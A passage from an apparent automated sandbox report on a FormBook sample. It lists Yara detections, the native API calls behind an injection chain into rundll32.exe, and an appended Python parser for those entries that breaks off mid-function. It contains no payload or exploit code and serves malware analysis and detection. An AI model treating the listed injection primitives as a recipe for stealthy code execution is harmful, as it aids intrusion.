Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041825A NtReadFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004182DA NtClose
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041838B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A495D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A498A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49820 NtEnumerateKey
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4B040 NtSuspendThread
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A499D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49950 NtQueueApcThread
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49A10 NtQuerySection
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49B00 NtSetValueKey
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A495F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49560 NtWriteFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A496D0 NtCreateKey
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49650 NtQueryValueKey
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49760 NtOpenProcess
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A49770 NtSetInformationFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4A770 NtOpenThread
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00418260 NtReadFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_004182E0 NtClose
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041825A NtReadFile
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_004182DA NtClose
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041838B NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046495D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649560 NtWriteFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0464AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046495F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649760 NtOpenProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0464A770 NtOpenThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0464A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046497A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0464B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046498F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046498A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046499D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649A20 NtResumeThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649A10 NtQuerySection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04649B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0464A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB82E0 NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB8260 NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB8390 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB81B0 NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB82DA NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB825A NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB838B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD20A8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B090
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD28EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ADE824
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1002
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0F900
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD22AE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABFA2B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3EBB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC03DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACDBD2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD2B28
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1841F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACD466
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD25DD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A00D20
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD2D07
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD1D55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD2EF7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A26E30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACD616
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD1FF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ADDFCE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046CD466
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0461841F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D1D55
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04600D20
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D2D07
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D25DD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04626E30
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046CD616
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D2EF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D1FF1
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046DDFCE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046DE824
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046C1002
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D28EC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D20A8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0461B090
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0460F900
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D22AE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046D2B28
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046C03DA
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_046CDBD2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0463EBB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBCB99
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC3FC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC1AF
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC1CB
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BA2FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BA8C50
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BA8C4B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BA2D90
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: String function: 00A0B150 appears 45 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: String function: 0041A090 appears 40 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0460B150 appears 35 times
          Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
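The "Code function" and Yara "File source" entries above are flattened table rows, and what an analyst wants from them is the per-process picture: which injection-related Nt* calls each process carries (NtCreateSection, NtMapViewOfSection, NtQueueApcThread, NtSetContextThread, NtResumeThread and the rest of the chain listed for processes 1 and 6), whether a process has Nt* wrappers in more than one address region (process 1 has them at 0x0041xxxx and at 0x00A4xxxx above), and which dumps the FormBook rules hit and with what page protection. The following Python script is an added example by the editor, not part of the Joe Sandbox report or of the sample; it parses entries in exactly that shape. Assumptions: the grouping of calls in INJECTION_PRIMITIVES is the editor's own classification, reading the fifth dot-separated field of a *.sdmp name as a Win32 page-protection value is an assumption about the sandbox's naming scheme, and SAMPLE_LINES is a constructed subset copied in the shape of the report's entries.

```python
"""Triage helper for sandbox 'Code function' and Yara 'File source' entries."""
import re
from collections import defaultdict

# Editor's own grouping: Nt* calls that make up a hollowing / remote-thread injection chain.
INJECTION_PRIMITIVES = {
    "NtCreateProcessEx", "NtUnmapViewOfSection", "NtAllocateVirtualMemory",
    "NtWriteVirtualMemory", "NtCreateSection", "NtMapViewOfSection",
    "NtProtectVirtualMemory", "NtQueueApcThread", "NtSetContextThread",
    "NtResumeThread",
}

# Assumption: the fifth dot-separated field of a *.sdmp name is a Win32 page-protection value.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# <process index>_<analysis context>_<address> then the API chain; the report repeats
# the same id at the end of each entry, so the pattern accepts (and drops) that tail.
FUNC_RE = re.compile(
    r"Code function:\s*(?P<pid>\d+)_(?P<ctx>\d+)_(?P<addr>[0-9A-Fa-f]{8})"
    r"\s*(?P<apis>.*?)"
    r",?\s*(?:(?P=pid)_(?P=ctx)_(?P=addr))?\s*$"
)
DUMP_RE = re.compile(
    r"(?P<pid>\d{8})\.(?P<ctx>\d{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
)

# Constructed sample, copied in the shape of this report's own entries.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0",
    r"Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0",
    r"Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950",
    r"Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30",
    r"Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004046A71_2_004046A7",
    r"Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk,6_2_04649780",
    r"Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046498A0 NtWriteVirtualMemory,6_2_046498A0",
    r"Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB81B0 NtCreateFile,6_2_02BB81B0",
    "Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY",
]


def parse_code_functions(lines):
    """Return (process index, address, [api, ...]) for every 'Code function' entry."""
    records = []
    for line in lines:
        m = FUNC_RE.search(line)
        if m:
            apis = [a for a in m["apis"].split(",") if a]
            records.append((int(m["pid"]), int(m["addr"], 16), apis))
    return records


def injection_primitives(records):
    """Per process index, the sorted injection-chain Nt* calls found in its code."""
    found = defaultdict(set)
    for pid, _addr, apis in records:
        found[pid].update(a for a in apis if a in INJECTION_PRIMITIVES)
    return {pid: sorted(s) for pid, s in found.items() if s}


def native_api_regions(records):
    """Per process index, the 64 KiB-aligned regions that contain Nt* wrappers.

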